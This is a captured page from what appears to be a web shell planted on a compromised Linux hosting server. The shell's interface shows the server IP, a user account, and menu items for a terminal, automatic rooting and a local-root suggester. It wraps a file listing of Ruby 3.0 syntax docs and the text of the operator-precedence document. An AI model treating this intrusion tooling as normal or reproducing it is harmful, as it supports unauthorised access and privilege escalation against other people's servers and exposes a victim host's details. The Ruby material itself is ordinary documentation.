Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby30 /
share /
doc /
alt-ruby30-doc /
syntax /
Delete
Unzip
Name
Size
Permission
Date
Action
assignment.rdoc
11.56
KB
-rw-r--r--
2024-04-23 13:53
calling_methods.rdoc
11.11
KB
-rw-r--r--
2024-04-23 13:53
comments.rdoc
7.27
KB
-rw-r--r--
2024-04-23 13:53
control_expressions.rdoc
14.2
KB
-rw-r--r--
2024-04-23 13:53
exceptions.rdoc
2.16
KB
-rw-r--r--
2024-04-23 13:53
literals.rdoc
11.23
KB
-rw-r--r--
2024-04-23 13:53
methods.rdoc
16.55
KB
-rw-r--r--
2024-04-23 13:53
miscellaneous.rdoc
3.78
KB
-rw-r--r--
2024-04-23 13:53
modules_and_classes.rdoc
8.25
KB
-rw-r--r--
2024-04-23 13:53
pattern_matching.rdoc
13.26
KB
-rw-r--r--
2024-04-23 13:53
precedence.rdoc
1.1
KB
-rw-r--r--
2024-04-23 13:53
refinements.rdoc
6.84
KB
-rw-r--r--
2024-04-23 13:53
Save
Rename
= Precedence From highest to lowest, this is the precedence table for ruby. High precedence operations happen before low precedence operations. !, ~, unary + ** unary - *, /, % +, - <<, >> & |, ^ >, >=, <, <= <=>, ==, ===, !=, =~, !~ && || .., ... ?, : modifier-rescue =, +=, -=, etc. defined? not or, and modifier-if, modifier-unless, modifier-while, modifier-until { } blocks Unary <code>+</code> and unary <code>-</code> are for <code>+1</code>, <code>-1</code> or <code>-(a + b)</code>. Modifier-if, modifier-unless, etc. are for the modifier versions of those keywords. For example, this is a modifier-unless statement: a += 1 unless a.zero? Note that <code>(a if b rescue c)</code> is parsed as <code>((a if b) rescue c)</code> due to reasons not related to precedence. See {modifier statements}[control_expressions_rdoc.html#label-Modifier+Statements]. <code>{ ... }</code> blocks have priority below all listed operations, but <code>do ... end</code> blocks have lower priority. All other words in the precedence table above are keywords.